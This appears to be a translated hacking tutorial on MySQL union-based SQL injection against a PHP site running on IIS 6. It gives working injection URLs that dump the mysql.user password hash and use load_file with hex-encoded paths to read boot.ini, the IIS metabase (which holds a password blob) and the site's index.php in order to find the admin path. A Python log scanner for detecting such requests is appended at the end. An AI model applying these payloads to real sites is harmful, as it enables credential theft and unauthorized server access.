PHP + MySQL injection: using load_file on the IIS config file to get the backend address

Source: Internet
Author: User
Tags php mysql

1. The backend (admin) address could not be found, so the first step is simply to dump the MySQL administrator's password:
Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
This returns the data: root*cb26b0546cadd30fc2432c095a6a3d54fa3c2ffd

2. Requesting a random non-existent path returns the default IIS 6 404 page, which shows that the web server environment is Windows + IIS 6 + PHP + MySQL.
First hex-encode the path string C:\\boot.ini, which gives: 0x633a5c5c626f6f742e696e69
Then request: Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633A5C5C626F6F742E696E69),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
The echoed output is:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="WINDOWS Server 2003, Enterprise" /fastdetect /noexecute=optout

So load_file can read files, but on its own that seems to be of little use. Or is it? Since the server is IIS 6, reading C:\\windows\\system32\\inetsrv\\metabase.xml gives you the site configuration.
*Note: for Windows paths the backslash must be doubled; with a single backslash load_file will most likely fail. The likely reason: a Windows path uses the backslash \ (top left to bottom right), whereas Linux uses the forward slash / (top right to bottom left). If a Windows path has a backslash followed by a t, what does \t mean in a programming language? What about \n, or \'? Exactly: the backslash in the path is consumed as an escape character. A double backslash \\ is what actually yields a single real backslash, and to output a double backslash you have to write four, \\\\. Frustrating, isn't it?
The final statement to inject is: Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0X633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

The parts of the configuration to look at are mainly these:

<IIsWebServer Location="/LM/W3SVC/2125961364"
    AuthFlags="0"
    LogExtFileFlags="LogExtFileDate | LogExtFileTime | LogExtFileClientIp | LogExtFileUriStem | LogExtFileUriQuery | LogExtFileHttpStatus | LogExtFileWin32Status | LogExtFileServerPort | LogExtFileUserAgent | LogExtFileHttpSubStatus"
    LogFileDirectory="E:\flylog"
    LogFileLocaltimeRollover="FALSE"
    LogFilePeriod="1"
    LogFileTruncateSize="20971520"
    LogPluginClsid="{ff160663-de82-11cf-bc0a-00aa006111e0}"
    ServerAutoStart="TRUE"
    ServerBindings=":80:***.com.cn
        :80:www.***.com.cn"
    ServerComment="***.com.cn"
>
</IIsWebServer>

And also:

<IIsWebVirtualDir Location="/LM/W3SVC/2125961364/ROOT"
    AccessFlags="AccessRead | AccessWrite | AccessScript"
    AppFriendlyName="Default Application"
    AppIsolated="2"
    AppRoot="/LM/W3SVC/2125961364/ROOT"
    AuthFlags="AuthAnonymous | AuthNTLM"
    DefaultDoc="Yindao.html,index.html,index.php,default.htm,default.asp,index.htm"
    DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension | DirBrowseShowLongDate | EnableDefaultDoc"
    Path="F:\web\2010716\new_flyer"
    UNCPassword="49634462500000000600000040000000894077f761d33600623e24d0e5dfbe254f63ee6490a3af6f918760ac2fbd00627e07669149f7464165 9a4383366f9edefd9c02f6555c8692c1c93d2483008b9721cbdae4fac9a380"
>
</IIsWebVirtualDir>

The Path attribute gives the web root, so we construct:

Http://www.***.com.cn/news_detail.php?newsid=-1+union+select+1,2,3,4,5,6,load_file(0x463a5c5c7765625c5c323031303731365c5c6e65775f666c7965725c5c696e6465782e706870),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
Right-click and view the page source.
*Note: when using load_file it is best to wrap it in a hex() call, i.e. hex(load_file(xxxxxxx)),
because I came across a website where the home page had some problematic code that I could not locate, and the injection point was on the home page. I used load_file on the home page file without wrapping it in hex, and the home page went into a loop, something like this: index contains an iframe, the iframe loads index, inside that index the iframe loads index again, and so on, looping until the machine's resources are exhausted. Although I do not know whether that site really used an iframe, this kind of nesting does produce an infinite loop, so I recommend nesting load_file inside hex.
What interests me more is this part of the code inside index:

require('admin_flier/common/function.php');

require('admin_flier/lib/class/form.class.php');

require('admin_flier/lib/class/db.class.php');

require('admin_flier/lib/class/page.class.php');

include('inc/head.php');

Oh, isn't that the backend address?
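From the defender's side, the metabase above has LogExtFileUriStem and LogExtFileUriQuery enabled, so every one of the injected requests in this post lands in the IIS W3C log with its full query string. The following Python is an added example (not code from the original post): it scans constructed IIS 6 W3C log lines, flags union/select and load_file in the query, and decodes the 0x hex literals back into the file path that was read, so an analyst can see which files were exposed. The field order in the #Fields header is an assumption about how this server's log was configured.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in IIS 6 W3C extended format; the assumed field order is
# date time c-ip cs-uri-stem cs-uri-query sc-status cs(User-Agent).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2010-07-16 10:01:02 203.0.113.5 /news_detail.php newsid=17 200 Mozilla/5.0
2010-07-16 10:01:09 203.0.113.5 /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,concat(user,password),8+from+mysql.user 200 Mozilla/5.0
2010-07-16 10:02:31 203.0.113.5 /news_detail.php newsid=-1+union+select+1,2,3,4,5,6,load_file(0x633a5c5c626f6f742e696e69),8 200 Mozilla/5.0
2010-07-16 10:03:44 203.0.113.5 /news_detail.php newsid=-1+union+select+1,2,hex(load_file(0x633A5C5C77696E646F77735C5C73797374656D33325C5C696E65747372765C5C4D657461426173652E786D6C)),8 200 Mozilla/5.0
2010-07-16 10:05:00 198.51.100.9 /index.php - 200 Mozilla/5.0
"""

UNION_RE = re.compile(r"\bunion\b[\s\S]{0,64}?\bselect\b", re.IGNORECASE)
LOAD_FILE_RE = re.compile(r"\bload_file\s*\(", re.IGNORECASE)
HEX_RE = re.compile(r"0x([0-9a-f]+)", re.IGNORECASE)  # MySQL 0x... literal


def decode_hex_literals(query):
    """Turn every 0x... literal in the query back into text (the path load_file read)."""
    paths = []
    for m in HEX_RE.finditer(query):
        digits = m.group(1)
        if len(digits) % 2:
            continue  # odd digit count cannot be a byte string
        paths.append(bytes.fromhex(digits).decode("latin-1"))
    return paths


def scan_log(text):
    """Return one finding per suspicious request: (c-ip, cs-uri-stem, tags, decoded paths)."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip blank lines and W3C directive lines
        fields = line.split(" ")
        if len(fields) < 6:
            continue
        c_ip, stem, raw_query = fields[2], fields[3], fields[4]
        query = unquote_plus(raw_query)  # '+' and %xx decoded, as PHP/MySQL saw it
        tags = []
        if UNION_RE.search(query):
            tags.append("union-select")
        if LOAD_FILE_RE.search(query):
            tags.append("load_file")
        if tags:
            findings.append((c_ip, stem, tags, decode_hex_literals(query)))
    return findings
```

The decoded paths show the double backslashes exactly as the attacker had to encode them, which is the escaping issue discussed in the note above.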
